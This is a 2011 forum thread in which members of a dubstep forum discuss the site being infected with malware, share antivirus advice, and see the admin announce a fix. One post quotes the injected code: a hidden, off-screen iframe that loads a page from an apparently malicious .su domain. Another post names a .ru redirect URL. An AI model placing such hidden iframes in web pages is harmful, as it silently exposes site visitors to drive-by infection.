MALWARE

debate, appreciation, interviews, reviews (events or releases), videos, radio shows
seckle

Re: MALWARE

Post by seckle » Mon Mar 14, 2011 1:18 pm

so many people take this place for granted. its unreal. you'd think that you people were being charged money to use this site, for the amount of shit that dubway gets in running it.

and all those people that had a moan on twitter over this place being down for 24hrs, we see you.

seckle

Post by seckle » Mon Mar 14, 2011 1:19 pm

mcaffee site advisor is saying this site is clean. if you see other alerts, post them here.

this is the internet, and its a risky place, so make sure your virus/malware scanners are updated.

Basic A

Post by Basic A » Mon Mar 14, 2011 1:24 pm

seckle wrote:so many people take this place for granted. its unreal. you'd think that you people were being charged money to use this site, for the amount of shit that dubway gets in running it, absolutely free of charge.

and all those people that had a moan on twitter over this place being down for 24hrs, we see you.
noone is taking anything for granted here man, I just gave a serious post about what a solid job dubway does all things considered, but you have to admit, single-handedly maintaining this place must be a bitch.

And who the fuck cares about Twitter? Its a glorified fuckin facebook wall.
Soundcloud
Soundcloud

:::::: Basic A. ::::: [url=hhttp://soundcloud.com/teknicyde]Teknicyde[/url] ::::: [url=hhttp://soundcloud.com/drjinx]Dr. J!nx[/url] :::::
Phantom Hertz - Fentplates - Reboot Records - Cosmology - Applied Mathematics

3za

Post by 3za » Mon Mar 14, 2011 1:31 pm

seckle wrote:so many people take this place for granted. its unreal. you'd think that you people were being charged money to use this site, for the amount of shit that dubway gets in running it, absolutely free of charge.
This site is good for what it has done, and I am grateful for Dubway for running it, but this site has been hit by malware more than any other site I visit. I don't want malware fucking up my shit. The security seems to be flawed with the amount of times this has happend to this site, so I can see why some are not happy, especially ones who got infected. I feel the security of this site could be improved, and I know others feel the same, I don't think that makes us ungrateful.
2 keyboards 1 computer
Sure_Fire wrote:By the way does anyone have the stems to make it bun dem? Missed the beatport comp and would very much like the ego booster of saying I remixed Skrillex.

ghandi

Post by ghandi » Mon Mar 14, 2011 2:33 pm

Deny that Java plug in, it'll infect you with System Tool, took me hours to get rid of it (using Malwarebytes' Anti-Malware).
Battle Gong wrote:no, please, dont let it happen. not more novelty ethnic dance music shit.
https://www.mixcloud.com/ghandi/late-night-back-at-mine/
Soundcloud

Motorway to Roswell

Post by Motorway to Roswell » Mon Mar 14, 2011 2:37 pm

is the forum clean now?
"...we now pause to test the soul of the Steppenwolf"

-[2]DAY_-

Post by -[2]DAY_- » Mon Mar 14, 2011 2:38 pm

lots n lots of threads are showing up locked on my end... but do not have a locked icon on forum pages, just inside the thread. Very strange
i thought i got banned or something
Soundcloud
SOME SONGS AND TUNES :|

ashley
Permanent Vacation

Post by ashley » Mon Mar 14, 2011 3:28 pm

Line 657 on http://www.dubstepforum.com

<noindex><div style="position:absolute;left:-1000px"><iframe width="10" height="10" style="border:0px;" src="http://xts-0g.noc.su/users/gratcer.php" ... ></noindex>

Yeah ok, some people take things for granted, but not in exchange for viruses.

cityzen

Post by cityzen » Mon Mar 14, 2011 3:37 pm

So whenever I have used this website in the past few days, something goes wrong. I can still view it but the tab sometimes shuts down and then re-opens. That has stopped but now the forward/back buttons (i'm using IE) don't work. To navigate I have to use the little drop down button next to the forward/back buttons and then click on the previous pages. However, the previous page is now always http://xts-pay.ru/ts/in.cgi?gratcer
WTF is this? Does it mean I/we have been infiltrated by some sneaky :q: Russians??
BLAHBLAHJAH wrote:... If you're ever in a burning building and you see smoke and smell fire, maybe it's worth getting
out...

Words

Post by Words » Mon Mar 14, 2011 4:27 pm

if i went on the site while it was infected on a comp with no virus protection am i fucked?

.spec

Post by .spec » Mon Mar 14, 2011 4:58 pm

Now, I know opening a second admin acount/server FTP account would, in theory, open a security hole, and I understand that, Im not asking he just grab any random active forum member and bring them in, but... I feel like there are enough well educated, trustworthy people on here that with a little bit of scouting he could (somewhat easily) find someone who would be willing to help with tasks like updating phpbb builds/maintaining the forum from a technical, backend standpoint.
This. I'm a sys admin by day and have admin-ed phpbb installs before. I'd be happy to help out, I just don't think there's every been a call for it.

.spec

Post by .spec » Mon Mar 14, 2011 4:59 pm

Words wrote:if i went on the site while it was infected on a comp with no virus protection am i fucked?
Probably not unless you chose to install something when prompted. You should go to free.avg.com and install their free anti-virus client just in case though.

Words

Post by Words » Mon Mar 14, 2011 5:01 pm

Cheers

seckle

Post by seckle » Mon Mar 14, 2011 5:09 pm

Words wrote:if i went on the site while it was infected on a comp with no virus protection am i fucked?
forget this site for a minute, in general, at the absolute minimum. you shouldn't be on the internet on PC without adblocker/malware scanners/a software/hardware firewall/ java auto updating and/or general virus protection.

if you're on mac OSX 10.5.x or higher , you should have the software firewall enabled in sys prefs/security (as well as stealth mode enabled, with "signed" software clicked to "on"), and your software updates checking and updating daily. i also highly recommend installing siteadvisor.com 's free site scanner, which is a firefox plugin that updates daily on launch.

incnic
Permanent Vacation

Post by incnic » Mon Mar 14, 2011 9:34 pm

well i got a virus lol
the 'security tool' one
took some good fixing
furking nnoying on a brand new system - guess cant trust anything tbh

nuff lols dsf
brostep

dubway
Admin

Post by dubway » Mon Mar 14, 2011 11:23 pm

fixed! :)

it is clean now.

dubway
Admin

Post by dubway » Mon Mar 14, 2011 11:29 pm

Basic A wrote:But. He could not only lighten his own load but also help keep us, his members, more secure with a simple enough change like a second technical-minded admin...
that would be really great :) i cant agree more

pompende

Post by pompende » Tue Mar 15, 2011 12:54 am

dubway wrote:
Basic A wrote:But. He could not only lighten his own load but also help keep us, his members, more secure with a simple enough change like a second technical-minded admin...
that would be really great :) i cant agree more
i wouldn't be offended in any way if you wanted to start a collection for server upgrades / maintenance ...

ashley
Permanent Vacation

Post by ashley » Tue Mar 15, 2011 1:01 am

Servers don't need upgrading.

Software just needs to be patched.

We have four servers to run our network, all Dubstep related, rarely any issues in the past 2 years...

zerbaman

Post by zerbaman » Tue Mar 15, 2011 7:36 am

Sheff wrote:im on chrome and all seems well
when i loaded the site though, it said i need additional plugins to view certain elements of the page
i thought fair enough, clicked it
it says its a Java plugin
i havent installed it yet after seeing this thread an the one in the hideout, i presume its something to do with that though?
Chrome already comes with Java doesn't it?
Mine wouldn't let me on until today, and AVG was going mental
Do you say zerbaman? Or do you say zebraman?
Soundcloud